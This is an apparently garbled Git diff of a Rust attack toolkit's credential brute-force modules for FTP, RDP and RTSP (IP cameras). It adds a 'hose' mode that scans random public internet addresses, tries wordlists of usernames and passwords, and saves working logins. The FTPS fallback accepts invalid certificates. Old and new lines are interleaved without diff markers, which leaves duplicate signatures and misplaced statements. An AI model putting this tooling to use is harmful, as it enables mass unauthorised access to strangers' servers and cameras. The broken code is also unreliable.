let s_found = stats_found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(5)).await;
println!(
"[*] Status: {} IPs scanned, {} valid credentials found",
s_checked.load(Ordering::Relaxed),
s_found.load(Ordering::Relaxed).to_string().green().bold()
);
let fname = prompt_default(&prompt_msg, default_name).await?;
let file_path = get_filename_in_current_dir(&fname);
match File::create(&file_path) {
Ok(mut file) => {
writeln!(
file,
"# FTP Bruteforce Unknown/Errored Responses (host,user,pass,error)"
)?;
for (host, user, pass, msg) in unknown_guard.iter() {
writeln!(file, "{} -> {}:{} - {}", host, user, pass, msg)?;
}
});
let run_random = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0";
if run_random {
println!("{}", "[*] Starting Random Internet Scan...".green());
loop {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let exc = exclusions.clone();
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
} else {
// File Mode
let content = tokio::fs::read_to_string(target).await.unwrap_or_default();
let lines: Vec<String> = content.lines().map(|s| s.trim().to_string()).filter(|s| !s.is_empty()).collect();
println!("{}", format!("[*] Loaded {} targets from file.", lines.len()).blue());
for ip_str in lines {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
if let Ok(ip) = ip_str.parse::<IpAddr>() {
tokio::spawn(async move {
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
println!("[+] Unknown responses saved to '{}'", file_path.display());
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
} else {
drop(permit);
}
}
for _ in 0..concurrency {
let _ = semaphore.acquire().await.context("Semaphore acquisition failed")?;
}
}
Ok(())
}
async fn mass_scan_host(
ip: IpAddr,
port: u16,
creds: Arc<(Vec<String>, Vec<String>)>,
stats_found: Arc<AtomicUsize>,
output_file: String,
verbose: bool
) {
let sa = SocketAddr::new(ip, port);
// 1. Connection Check
if timeout(Duration::from_millis(MASS_SCAN_CONNECT_TIMEOUT_MS), TcpStream::connect(&sa)).await.is_err() {
return;
}
let (users, passes) = &*creds;
// 2. Iterative Bruteforce
// Sequential try to avoid blasting the server
let addr_str = format!("{}:{}", ip, port);
for user in users {
for pass in passes {
let res = try_ftp_login(&addr_str, &ip.to_string(), user, pass, verbose).await;
match res {
Ok(true) => {
// Format: IP:PORT:USER:PASS
let msg = format!("{}:{}:{}:{}", ip, port, user, pass);
println!("\r{}", format!("[+] FOUND: {}", msg).green().bold());
if let Ok(mut file) = OpenOptions::new().create(true).append(true).open(&output_file).await {
let _ = file.write_all(format!("{}\n", msg).as_bytes()).await;
}
stats_found.fetch_add(1, Ordering::Relaxed);
return; // Stop after first success
}
Ok(false) => { // Auth failed
}
Err(e) => {
eprintln!(
"[!] Could not create or write unknown response file '{}': {}",
file_path.display(),
e
);
// If conn refused/timeout, likely dead or blocked, abort this host
let err = e.to_string().to_lowercase();
if err.contains("refused") || err.contains("timeout") || err.contains("reset") {
return;
}
}
}
}
}
Ok(())
}
async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Result<bool> {
/// Try login using address string and fallback to FTPS if needed
async fn try_ftp_login(addr: &str, target: &str, user: &str, pass: &str, verbose: bool) -> Result<bool> {
// Attempt 1: Plain FTP
match AsyncFtpStream::connect(addr).await {
Ok(mut ftp) => {
if verbose {
//println!("[i] Connecting to {} (plain FTP)", addr);
}
match timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS), AsyncFtpStream::connect(addr)).await {
Ok(Ok(mut ftp)) => {
match ftp.login(user, pass).await {
Ok(_) => {
let _ = ftp.quit().await;
@@ -435,74 +557,54 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
}
Err(e) => {
let msg = e.to_string();
if msg.contains("530") {
return Ok(false);
} else if msg.contains("550 SSL/TLS required") || msg.contains("TLS required on the control channel") || msg.contains("220 TLS go first") || msg.contains("SSL connection required") {
println!("[i] {} - Plain FTP login indicated TLS required. Attempting FTPS...", addr);
} else if msg.contains("421") {
println!("[-] {} - Server reported too many connections (421). Sleeping briefly...", addr);
sleep(Duration::from_secs(2)).await;
return Ok(false);
} else {
if verbose {
println!("[!] FTP login error for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e);
match FtpErrorType::classify_error(&msg) {
FtpErrorType::AuthenticationFailed => {
return Ok(false);
}
FtpErrorType::TlsRequired => {
// Proceed to FTPS attempt
}
FtpErrorType::ConnectionLimitExceeded => {
sleep(Duration::from_secs(1)).await;
return Ok(false); // Treat as soft fail
}
_ => {
return Err(anyhow!("FTP login error: {}", msg));
}
return Err(anyhow!("FTP login error: {}", msg));
}
}
}
}
Err(e) => {
let msg = e.to_string();
if msg.contains("SSL/TLS required") || msg.contains("TLS required on the control channel") || msg.contains("220 TLS go first") || msg.contains("SSL connection required") {
println!("[i] {} - Plain FTP connection indicated TLS required. Attempting FTPS...", addr);
} else if msg.contains("421") {
println!("[-] {} - Server reported too many connections during connect (421). Sleeping briefly...", addr);
sleep(Duration::from_secs(2)).await;
return Ok(false);
} else {
if verbose {
println!("[!] FTP connection error to {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e);
}
return Err(anyhow!("FTP connection error: {}", msg));
}
Ok(Err(e)) => {
// Connection level error
return Err(e.into());
}
Err(_) => {
return Err(anyhow!("Timeout"));
}
}
// 2️⃣ Only if needed, try FTPS
if verbose {
println!("[i] {} Attempting FTPS login for user '{}'", addr, user);
}
let mut ftp_tls = AsyncNativeTlsFtpStream::connect(addr)
.await
.map_err(|e| {
if verbose {
println!("[!] FTPS base connect failed for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, e, e);
}
anyhow!("FTPS base connect failed: {}", e)
})?;
// FTPS fallback logic (retained but lightweight for mass scan? maybe skip for mass scan unless configured?)
// For now, reuse it as it makes the check robust.
// FTPS attempts ... (simulated reuse of original logic below)
let mut ftp_tls = match timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS), AsyncNativeTlsFtpStream::connect(addr)).await {
Ok(Ok(s)) => s,
_ => return Err(anyhow!("FTPS Connect failed")),
};
let connector = AsyncNativeTlsConnector::from(
TlsConnector::new()
.danger_accept_invalid_certs(true)
.danger_accept_invalid_hostnames(true),
);
let domain = target.trim_start_matches('[').split(&[']', ':'][..]).next().unwrap_or(target);
let domain = addr
.trim_start_matches('[')
.split(&[']', ':'][..])
.next()
.unwrap_or(addr);
ftp_tls = ftp_tls
.into_secure(connector, domain)
.await
.map_err(|e| {
if verbose {
println!("[!] TLS upgrade failed for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, e, e);
}
anyhow!("TLS upgrade failed: {}", e)
})?;
ftp_tls = match ftp_tls.into_secure(connector, domain).await {
Ok(s) => s,
Err(e) => return Err(anyhow!("TLS Upgrade: {}", e)),
};
match ftp_tls.login(user, pass).await {
Ok(_) => {
@@ -510,97 +612,50 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
Ok(true)
}
Err(e) => {
let msg = e.to_string();
if msg.contains("530") {
Ok(false)
} else {
if verbose {
println!("[!] FTPS error for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e);
}
Err(anyhow!("FTPS error: {}", msg))
match FtpErrorType::classify_error(&e.to_string()) {
FtpErrorType::AuthenticationFailed => Ok(false),
_ => Err(anyhow!("FTPS Error: {}", e)),
}
}
}
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
let mut excluded = false;
for net in exclusions {
if net.contains(ip_addr) {
excluded = true;
break;
}
}
if !excluded { return ip_addr; }
}
}
async fn is_ip_checked(ip: &impl ToString) -> bool {
if !std::path::Path::new(STATE_FILE).exists() {
return false;
}
let ip_s = ip.to_string();
let status = Command::new("grep")
.arg("-F")
.arg("-q")
.arg(format!("checked: {}", ip_s))
.arg(STATE_FILE)
.stderr(std::process::Stdio::null())
.status()
.await;
match status { Ok(s) => s.success(), Err(_) => false }
}
// === Helpers === (prompt_required, prompt_default, prompt_yes_no, load_lines, log, get_filename_in_current_dir remain unchanged)
async fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
}
println!("{}", "This field is required.".yellow());
async fn mark_ip_checked(ip: &impl ToString) {
let data = format!("checked: {}\n", ip.to_string());
if let Ok(mut file) = OpenOptions::new().create(true).append(true).open(STATE_FILE).await {
let _ = file.write_all(data.as_bytes()).await;
}
}
async fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() {
default.to_string()
} else {
trimmed.to_string()
})
}
async fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let input = s.trim().to_lowercase();
match input.as_str() {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow()),
}
}
}
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path.as_ref()).map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(|line| line.ok().map(|s| s.trim().to_string()))
.filter(|line| !line.is_empty())
.collect())
}
fn get_filename_in_current_dir(input: &str) -> PathBuf {
Path::new(input)
.file_name()
.map(|name_os_str| PathBuf::from(format!("./{}", name_os_str.to_string_lossy())))
.unwrap_or_else(|| PathBuf::from(input))
}
File diff suppressed because it is too large Load Diff
+1
View File
@@ -3,6 +3,7 @@
pub mod ftp_bruteforce;
pub mod ftp_anonymous;
pub mod telnet_bruteforce;
pub mod telnet_hose;
pub mod ssh_bruteforce;
pub mod ssh_user_enum;
pub mod ssh_spray;
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+25 -181
View File
@@ -1,21 +1,26 @@
use anyhow::{anyhow, Context, Result};
use anyhow::{anyhow, Result, Context};
use colored::*;
use futures::stream::{FuturesUnordered, StreamExt};
use std::{
fs::File,
io::{BufRead, BufReader, Write},
path::{Path, PathBuf},
path::Path,
sync::Arc,
sync::atomic::{AtomicBool, AtomicU64, Ordering},
time::Instant,
};
use tokio::{
io::{AsyncBufReadExt, AsyncWriteExt},
process::Command,
sync::{Mutex, Semaphore},
time::{sleep, Duration, timeout},
};
use crate::utils::{
prompt_yes_no, prompt_default, prompt_port,
prompt_wordlist, prompt_int_range,
load_lines, get_filename_in_current_dir,
};
const PROGRESS_INTERVAL_SECS: u64 = 2;
const MAX_MEMORY_LOAD_SIZE: u64 = 150 * 1024 * 1024; // 150 MB
@@ -141,7 +146,7 @@ impl RdpSecurityLevel {
}
}
async fn prompt_selection() -> Result<Self> {
fn prompt_selection() -> Result<Self> {
println!("\nRDP Security Level Options:");
println!(" 1. Auto (let client negotiate)");
println!(" 2. NLA (Network Level Authentication)");
@@ -150,7 +155,7 @@ impl RdpSecurityLevel {
println!(" 5. Negotiate (try all methods)");
loop {
let input = prompt_default("Security level", "1").await?;
let input = prompt_default("Security level", "1")?;
match input.trim() {
"1" => return Ok(RdpSecurityLevel::Auto),
"2" => return Ok(RdpSecurityLevel::Nla),
@@ -246,86 +251,27 @@ pub async fn run(target: &str) -> Result<()> {
display_banner();
println!("{}", format!("[*] Target: {}", target).cyan());
let port: u16 = loop {
let input = prompt_default("RDP Port", "3389").await?;
match input.trim().parse::<u16>() {
Ok(p) if p > 0 => break p,
Ok(_) => println!("{}", "Port must be between 1 and 65535.".yellow()),
Err(_) => println!("{}", "Invalid port number. Please enter a number between 1 and 65535.".yellow()),
}
};
let port: u16 = prompt_port("RDP Port", 3389)?;
let usernames_file_path = loop {
let input = prompt_required("Username wordlist path").await?;
let path = Path::new(&input);
if !path.exists() {
println!("{}", format!("File '{}' does not exist.", input).yellow());
continue;
}
if !path.is_file() {
println!("{}", format!("'{}' is not a regular file.", input).yellow());
continue;
}
match File::open(path) {
Ok(_) => break input,
Err(e) => {
println!("{}", format!("Cannot read file '{}': {}", input, e).yellow());
continue;
}
}
};
let usernames_file_path = prompt_wordlist("Username wordlist")?;
let passwords_file_path = loop {
let input = prompt_required("Password wordlist path").await?;
let path = Path::new(&input);
if !path.exists() {
println!("{}", format!("File '{}' does not exist.", input).yellow());
continue;
}
if !path.is_file() {
println!("{}", format!("'{}' is not a regular file.", input).yellow());
continue;
}
match File::open(path) {
Ok(_) => break input,
Err(e) => {
println!("{}", format!("Cannot read file '{}': {}", input, e).yellow());
continue;
}
}
};
let passwords_file_path = prompt_wordlist("Password wordlist")?;
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "10").await?;
match input.trim().parse::<usize>() {
Ok(n) if n > 0 && n <= 10000 => break n,
Ok(n) if n == 0 => println!("{}", "Concurrency must be greater than 0.".yellow()),
Ok(_) => println!("{}", "Concurrency must be between 1 and 10000.".yellow()),
Err(_) => println!("{}", "Invalid number. Please enter a positive integer.".yellow()),
}
};
let concurrency = prompt_int_range("Max concurrent tasks", 10, 1, 10000)? as usize;
let timeout_secs: u64 = loop {
let input = prompt_default("Connection timeout (seconds)", "10").await?;
match input.trim().parse::<u64>() {
Ok(n) if n > 0 && n <= 300 => break n,
Ok(n) if n == 0 => println!("{}", "Timeout must be greater than 0.".yellow()),
Ok(_) => println!("{}", "Timeout must be between 1 and 300 seconds.".yellow()),
Err(_) => println!("{}", "Invalid timeout. Please enter a number between 1 and 300.".yellow()),
}
};
let timeout_secs = prompt_int_range("Connection timeout (seconds)", 10, 1, 300)? as u64;
let stop_on_success = prompt_yes_no("Stop on first success?", true).await?;
let save_results = prompt_yes_no("Save results to file?", true).await?;
let stop_on_success = prompt_yes_no("Stop on first success?", true)?;
let save_results = prompt_yes_no("Save results to file?", true)?;
let save_path = if save_results {
Some(prompt_default("Output file name", "rdp_results.txt").await?)
Some(prompt_default("Output file name", "rdp_results.txt")?)
} else {
None
};
let verbose = prompt_yes_no("Verbose mode?", false).await?;
let combo_mode = prompt_yes_no("Combination mode? (try every password with every user)", false).await?;
let security_level = RdpSecurityLevel::prompt_selection().await?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let combo_mode = prompt_yes_no("Combination mode? (try every password with every user)", false)?;
let security_level = RdpSecurityLevel::prompt_selection()?;
let addr = format_socket_address(target, port);
@@ -337,14 +283,14 @@ pub async fn run(target: &str) -> Result<()> {
println!("[*] Timeout: {} seconds", timeout_secs);
// Count lines for display
let user_count = count_lines(&usernames_file_path)?;
let user_count = load_lines(&usernames_file_path)?.len();
if user_count == 0 {
println!("[!] Username wordlist is empty or invalid. Exiting.");
return Ok(());
}
println!("[*] Loaded {} usernames", user_count);
let password_count = count_lines(&passwords_file_path)?;
let password_count = load_lines(&passwords_file_path)?.len();
if password_count == 0 {
println!("[!] Password wordlist is empty or invalid. Exiting.");
return Ok(());
@@ -421,7 +367,7 @@ pub async fn run(target: &str) -> Result<()> {
if let Some(path_str) = save_path {
let filename = get_filename_in_current_dir(&path_str);
match File::create(&filename) {
match File::create(&filename).context(format!("Failed to create output file '{}'", filename.display())) {
Ok(mut file) => {
for (host_addr, user, pass) in creds.iter() {
if writeln!(file, "{} -> {}:{}", host_addr, user, pass).is_err() {
@@ -432,7 +378,7 @@ pub async fn run(target: &str) -> Result<()> {
println!("[+] Results saved to '{}'", filename.display());
}
Err(e) => {
eprintln!("[!] Could not create output file '{}': {}", filename.display(), e);
eprintln!("[!] {}", e);
}
}
}
@@ -1025,115 +971,13 @@ async fn try_rdp_login_rdesktop(addr: &str, user: &str, pass: &str, timeout_dura
}
}
async fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
} else {
println!("{}", "This field is required. Please provide a value.".yellow());
}
}
}
async fn prompt_default(msg: &str, default_val: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default_val).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() {
default_val.to_string()
} else {
trimmed.to_string()
})
}
async fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let input = s.trim().to_lowercase();
if input.is_empty() {
return Ok(default_yes);
} else if input == "y" || input == "yes" {
return Ok(true);
} else if input == "n" || input == "no" {
return Ok(false);
} else {
println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow());
}
}
}
fn count_lines<P: AsRef<Path>>(path: P) -> Result<usize> {
let file = File::open(path.as_ref())
.map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(Result::ok)
.filter(|line| !line.trim().is_empty())
.count())
}
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path.as_ref())
.map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(Result::ok)
.map(|line| line.trim().to_string())
.filter(|line| !line.is_empty())
.collect())
}
fn get_filename_in_current_dir(input_path_str: &str) -> PathBuf {
let path = Path::new(input_path_str);
let filename_component = path
.file_name()
.map(|os_str| os_str.to_string_lossy())
.unwrap_or_else(|| std::borrow::Cow::Borrowed(input_path_str));
let final_name = if filename_component.is_empty()
|| filename_component == "."
|| filename_component == ".."
|| filename_component.contains('/')
|| filename_component.contains('\\')
{
"rdp_results.txt"
} else {
filename_component.as_ref()
};
PathBuf::from(format!("./{}", final_name))
}
fn sanitize_rdp_argument(input: &str) -> String {
input.chars()
@@ -1,101 +1,57 @@
use anyhow::{anyhow, Context, Result};
use anyhow::{anyhow, Result, Context};
use base64::engine::general_purpose::STANDARD as Base64;
use base64::Engine as _;
use colored::*;
use futures::stream::{FuturesUnordered, StreamExt};
use std::{
fs::File,
io::{BufRead, BufReader, Write},
net::SocketAddr,
path::{Path, PathBuf},
io::Write,
net::{IpAddr, Ipv4Addr, SocketAddr},
sync::Arc,
time::Instant,
sync::atomic::{AtomicBool, AtomicUsize, Ordering},
time::Duration,
};
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use tokio::{
io::{AsyncBufReadExt, AsyncReadExt, AsyncWriteExt},
io::{AsyncReadExt, AsyncWriteExt},
net::TcpStream,
sync::{Mutex, Semaphore},
time::{sleep, Duration},
time::{sleep, timeout},
process::Command,
fs::OpenOptions,
};
use rand::Rng;
use crate::utils::{
prompt_yes_no, prompt_wordlist, prompt_default, prompt_int_range, prompt_port,
load_lines, get_filename_in_current_dir, normalize_target,
};
use crate::modules::creds::utils::BruteforceStats;
const PROGRESS_INTERVAL_SECS: u64 = 2;
const MASS_SCAN_CONNECT_TIMEOUT_MS: u64 = 3000;
const STATE_FILE: &str = "rtsp_hose_state.log";
struct Statistics {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
start_time: Instant,
}
impl Statistics {
fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
start_time: Instant::now(),
}
}
fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
}
}
fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Successful: {}", success.to_string().green().bold());
println!(" Failed: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
}
}
}
// Hardcoded exclusions (Private + Cloudflare + Google + Link Local etc) - Copied from telnet_hose
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", // Private
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8", // Multicast/Reserved
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32", // Carrier/LinkLocal/Broadcast
// Cloudflare
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32",
// Google
"8.8.8.8/32", "8.8.4.4/32"
];
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Advanced RTSP Brute Force Module ║".cyan());
println!("{}", "║ IP Camera and Streaming Server Credential Testing ║".cyan());
println!("{}", "║ Supports path enumeration and custom headers ║".cyan());
println!("{}", "║ Modes: Single Target & Mass Scan (Hose) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!();
}
@@ -103,43 +59,45 @@ fn display_banner() {
/// Main entry point for the advanced RTSP brute force module.
pub async fn run(target: &str) -> Result<()> {
display_banner();
// Check for Mass Scan Mode conditions
// If target is "random", "0.0.0.0", "0.0.0.0/0", or looks like a file path (and we can assume it's a file list)
// Note: The caller usually handles file loading for specific modules, but for "hose" modules like telnet_hose, passing the file path is common.
// We'll treat it as mass scan if it's explicitly "random" OR "0.0.0.0" OR if it points to an existing file.
// Simple heuristic: if we can open it as a file, treat as file list for mass scan.
let is_mass_scan = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0" || std::path::Path::new(target).is_file();
println!("{}", format!("[*] Target: {}", target).cyan());
if is_mass_scan {
println!("{}", "[*] Mode: Mass Scan / Hose".yellow());
return run_mass_scan(target).await;
}
let port: u16 = loop {
let input = prompt_default("RTSP Port", "554").await?;
match input.parse() {
Ok(p) => break p,
Err(_) => println!("Invalid port. Try again."),
}
};
// --- Standard Single-Target Logic ---
let usernames_file = prompt_required("Username wordlist").await?;
let passwords_file = prompt_required("Password wordlist").await?;
let port: u16 = prompt_port("RTSP Port", 554)?;
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "10").await?;
match input.parse() {
Ok(n) if n > 0 => break n,
_ => println!("Invalid number. Try again."),
}
};
let usernames_file = prompt_wordlist("Username wordlist")?;
let passwords_file = prompt_wordlist("Password wordlist")?;
let stop_on_success = prompt_yes_no("Stop on first success?", true).await?;
let save_results = prompt_yes_no("Save results to file?", true).await?;
let save_path = if save_results {
Some(prompt_default("Output file", "rtsp_results.txt").await?)
let concurrency = prompt_int_range("Max concurrent tasks", 10, 1, 10000)? as usize;
let stop_on_success = prompt_yes_no("Stop on first success?", true)?;
let _save_results = prompt_yes_no("Save results to file?", true)?;
let save_path = if _save_results {
Some(prompt_default("Output file", "rtsp_results.txt")?)
} else {
None
};
let verbose = prompt_yes_no("Verbose mode?", false).await?;
let combo_mode = prompt_yes_no("Combination mode? (try every pass with every user)", false).await?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let combo_mode = prompt_yes_no("Combination mode? (try every pass with every user)", false)?;
let advanced_mode = prompt_yes_no("Use advanced RTSP commands/headers (DESCRIBE + custom headers)?", false).await?;
let advanced_mode = prompt_yes_no("Use advanced RTSP commands/headers (DESCRIBE + custom headers)?", false)?;
let mut advanced_headers: Vec<String> = Vec::new();
let advanced_command = if advanced_mode {
let method = prompt_default("RTSP method to use (e.g. DESCRIBE)", "DESCRIBE").await?;
if prompt_yes_no("Load extra RTSP headers from a file?", false).await? {
let headers_path = prompt_required("Path to RTSP headers file").await?;
let method = prompt_default("RTSP method to use (e.g. DESCRIBE)", "DESCRIBE")?;
if prompt_yes_no("Load extra RTSP headers from a file?", false)? {
let headers_path = prompt_wordlist("Path to RTSP headers file")?;
advanced_headers = load_lines(&headers_path)?;
}
Some(method)
@@ -148,10 +106,29 @@ pub async fn run(target: &str) -> Result<()> {
};
let advanced_headers = Arc::new(advanced_headers);
let (addr, implicit_path) = normalize_target_input(target, port)?;
// Extract RTSP path if present (e.g., rtsp://host:port/path -> path)
let implicit_path = extract_rtsp_path(target);
// Normalize target and add port if needed
let target_normalized = if target.starts_with("rtsp://") {
target.strip_prefix("rtsp://")
.expect("Target starts with rtsp://")
.split('/')
.next()
.unwrap_or(target)
} else {
target.split('/').next().unwrap_or(target)
};
let normalized = normalize_target(target_normalized)?;
let addr = if normalized.contains(':') {
normalized
} else {
format!("{}:{}", normalized, port)
};
let found = Arc::new(Mutex::new(Vec::new()));
let stop = Arc::new(AtomicBool::new(false));
let stats = Arc::new(Statistics::new());
let stats = Arc::new(BruteforceStats::new()); // Standardized stats
let semaphore = Arc::new(Semaphore::new(concurrency));
println!("\n[*] Starting brute-force on {}", addr);
@@ -166,23 +143,19 @@ pub async fn run(target: &str) -> Result<()> {
let users = load_lines(&usernames_file)?;
if users.is_empty() {
println!("[!] Username wordlist is empty or invalid. Exiting.");
println!("[!] Username wordlist is empty. Exiting.");
return Ok(());
}
let pass_lines: Vec<String> = BufReader::new(File::open(&passwords_file)?)
.lines()
.filter_map(|line| line.ok().map(|s| s.trim().to_string()))
.filter(|line| !line.is_empty())
.collect();
let pass_lines = load_lines(&passwords_file)?;
if pass_lines.is_empty() {
println!("[!] Password wordlist is empty or invalid. Exiting.");
println!("[!] Password wordlist is empty. Exiting.");
return Ok(());
}
let brute_force_paths = prompt_yes_no("Brute force possible RTSP paths (e.g. /stream /live)?", false).await?;
let brute_force_paths = prompt_yes_no("Brute force possible RTSP paths (e.g. /stream /live)?", false)?;
let mut paths = if brute_force_paths {
let paths_file = prompt_required("Path to RTSP paths file").await?;
let paths_file = prompt_wordlist("Path to RTSP paths file")?;
load_lines(&paths_file)?
} else {
vec!["".to_string()]
@@ -215,9 +188,7 @@ pub async fn run(target: &str) -> Result<()> {
let mut idx = 0usize;
for pass in pass_lines {
if stop_on_success && stop.load(Ordering::Relaxed) {
break;
}
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
let userlist: Vec<String> = if combo_mode {
users.clone()
@@ -226,13 +197,9 @@ pub async fn run(target: &str) -> Result<()> {
};
for user in userlist {
if stop_on_success && stop.load(Ordering::Relaxed) {
break;
}
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
for path in &paths {
if stop_on_success && stop.load(Ordering::Relaxed) {
break;
}
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
let addr_clone = addr.clone();
let user_clone = user.clone();
@@ -249,16 +216,14 @@ pub async fn run(target: &str) -> Result<()> {
let verbose_flag = verbose;
tasks.push(tokio::spawn(async move {
